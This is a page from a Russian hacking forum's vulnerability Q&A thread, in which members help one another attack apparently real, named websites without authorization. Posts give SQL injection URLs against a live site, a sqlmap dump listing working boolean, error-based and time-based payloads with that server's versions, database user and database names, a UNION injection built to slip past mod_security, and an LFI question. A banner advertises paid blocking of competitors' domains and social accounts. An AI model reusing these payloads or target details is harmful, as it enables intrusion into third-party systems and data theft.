Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 128 из 296

128

Опции темы

Поиск в этой теме

Опции просмотра

26.08.2016, 15:13

pw0ned

Участник форума

Регистрация: 08.01.2016

Сообщений: 118

С нами: 5445686

Репутация: 14

Цитата:

Сообщение от MaxxWell

↑
http://sirus.su/in.php
Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.

LFI через phpinfo() разве что.

но нужен инклуд.

𝕏 Twitter Reddit Telegram Копировать ссылку

26.08.2016, 15:38

MaxxWell

Познающий

Регистрация: 05.01.2016

Сообщений: 31

С нами: 5450006

Репутация: 0

Цитата:

Сообщение от pw0ned

↑
LFI через phpinfo() разве что.
но нужен инклуд.

А где ж его взять то?))

26.08.2016, 16:47

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

С нами: 9979143

Репутация: -5

Имеется сайт site.ru/ajax/Areas/Product/

Если в cookies поставить ' в timezone, то выдает следующее:

.SpoilerTarget" type="button">Spoiler: Ответ HTTP 500:

Код:

Здесь может быть sql-injection или это просто вывод ошибки такой?

26.08.2016, 16:52

MaxxWell

Познающий

Регистрация: 05.01.2016

Сообщений: 31

С нами: 5450006

Репутация: 0

Как подобрать если не выводит кол-во?

Код:

http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+

26.08.2016, 17:48

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

С нами: 9979143

Репутация: -5

Цитата:

Сообщение от MaxxWell

↑
Как подобрать если не выводит кол-во?

Код:

http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+

Попробуй другой URL))

Код:

http://www.premium-network.ru/index.php?id=add&used=faq&s=3

.SpoilerTarget" type="button">Spoiler: подсказка

Код:

---
Parameter: s (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=add&used=faq&s=3' AND 9304=9304 AND 'HJyF'='HJyF

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=add&used=faq&s=3' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(3147=3147,1))),0x7171786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xSeN'='xSeN

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=add&used=faq&s=3' AND SLEEP(5) AND 'PmOg'='PmOg
---

web server operating system: FreeBSD
web application technology: PHP 5.4.26, Apache 2.2.27
back-end DBMS: MySQL >= 5.5
banner:    '5.5.37'
current user:    'forumpt@localhost'
current database:    'new_premium'
current user is DBA:    False
database management system users [1]:[*] 'forumpt'@'localhost'

available databases [3]:[*] forumpt[*] information_schema[*] new_premium

26.08.2016, 17:50

pw0ned

Участник форума

Регистрация: 08.01.2016

Сообщений: 118

С нами: 5445686

Репутация: 14

Цитата:

Сообщение от kacergei

↑
Имеется сайт site.ru/ajax/Areas/Product/
Если в cookies поставить
'
в timezone, то выдает следующее:
Spoiler: Ответ HTTP 500:

Код:

Здесь может быть sql-injection или это просто вывод ошибки такой?

Ошибка скрипта вроде как.

26.08.2016, 18:55

demafly76

Новичок

Регистрация: 14.08.2016

Сообщений: 17

С нами: 5130326

Репутация: 0

Код:

http://site.ru/news-post.php?id=-1'+/*!50000Union*/+Select+1,schema_name,3,4,5,6+From+/*!information_schema.schemata+limit+0,2*/+--+sp

стоит mod_security, выводит только 1 базу, с таблицами также! добавлял limit и group_concat, таже фигня mod_security не ругается, что может быть?

version:

5.5.42-37.1-log